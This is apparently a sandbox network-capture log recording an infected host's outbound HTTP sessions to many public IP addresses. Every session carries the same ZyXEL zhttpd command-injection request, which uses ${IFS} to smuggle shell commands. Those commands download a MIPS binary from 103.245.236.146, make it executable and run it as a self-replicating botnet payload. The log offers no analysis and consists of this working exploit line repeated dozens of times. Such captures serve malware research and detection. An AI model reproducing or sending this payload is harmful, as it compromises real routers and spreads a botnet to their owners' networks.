                                                Jan 28, 2024 10:16:15.663284063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1925192.168.2.233390457.8.254.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663312912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1926192.168.2.233996678.21.169.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663322926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1927192.168.2.234894677.11.20.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663374901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1928192.168.2.234275496.140.215.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663398981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1929192.168.2.2353106183.213.42.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663429976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1930192.168.2.2338886120.188.34.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663450956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1931192.168.2.234288859.179.199.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663480997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1932192.168.2.2347588167.51.222.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663531065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1933192.168.2.2355822184.54.154.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663559914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1934192.168.2.234707618.246.253.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663600922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1935192.168.2.234466269.109.59.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663616896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1936192.168.2.2336768142.5.9.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663635969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1937192.168.2.235164464.246.40.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663669109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1938192.168.2.234493018.32.165.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663691044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1939192.168.2.233592896.216.4.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663717031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1940192.168.2.235508449.164.53.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663729906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1941192.168.2.2336494164.226.105.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663788080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1942192.168.2.234059671.163.233.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663827896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1943192.168.2.233702866.138.173.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663840055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1944192.168.2.2341432162.54.179.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663840055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1945192.168.2.2344496117.132.9.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663861990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1946192.168.2.2359998179.89.33.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663902998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1947192.168.2.2356392168.182.83.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663918972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1948192.168.2.2359376119.212.151.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663938046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1949192.168.2.234296848.212.4.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.663971901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1950192.168.2.2355558221.59.148.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664002895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1951192.168.2.23582148.36.39.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664033890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1952192.168.2.2346178137.207.124.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664091110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1953192.168.2.2360272206.75.246.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664094925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1954192.168.2.233927890.37.75.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664129019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1955192.168.2.2354900111.29.3.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664160967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1956192.168.2.2347186121.78.82.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664191961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1957192.168.2.2352980151.140.160.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664195061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1958192.168.2.23573349.209.28.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664213896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1959192.168.2.233906697.17.0.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664252043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1960192.168.2.23467965.199.194.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664307117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1961192.168.2.233911871.229.64.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664329052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1962192.168.2.234128644.61.195.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664344072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1963192.168.2.23352109.230.221.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664376974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1964192.168.2.233881263.41.13.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664412022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1965192.168.2.2339830166.7.180.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664446115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1966192.168.2.2352696116.204.255.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664467096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1967192.168.2.2359706170.243.110.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664494991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1968192.168.2.234261073.50.231.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664525986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1969192.168.2.2339260188.190.148.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664544106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1970192.168.2.234101820.37.67.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664580107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1971192.168.2.2348590216.136.17.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664586067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1972192.168.2.2350268115.255.197.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664623022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1973192.168.2.235630864.140.134.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664654970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1974192.168.2.23379469.98.158.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664688110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1975192.168.2.2354144114.165.227.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664716005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1976192.168.2.234095291.113.142.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664748907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1977192.168.2.2355834162.73.107.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664768934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1978192.168.2.2357044209.151.14.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664798975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1979192.168.2.235166423.137.107.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664819002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1980192.168.2.233376699.10.105.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664818048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1981192.168.2.2343256205.25.101.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664865017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1982192.168.2.234552666.238.156.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664896011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1983192.168.2.233974620.197.70.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664918900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1984192.168.2.234861263.44.185.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664947033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1985192.168.2.234164412.232.100.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.664974928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1986192.168.2.235596831.189.146.199443
                                                TimestampBytes transferredDirectionData
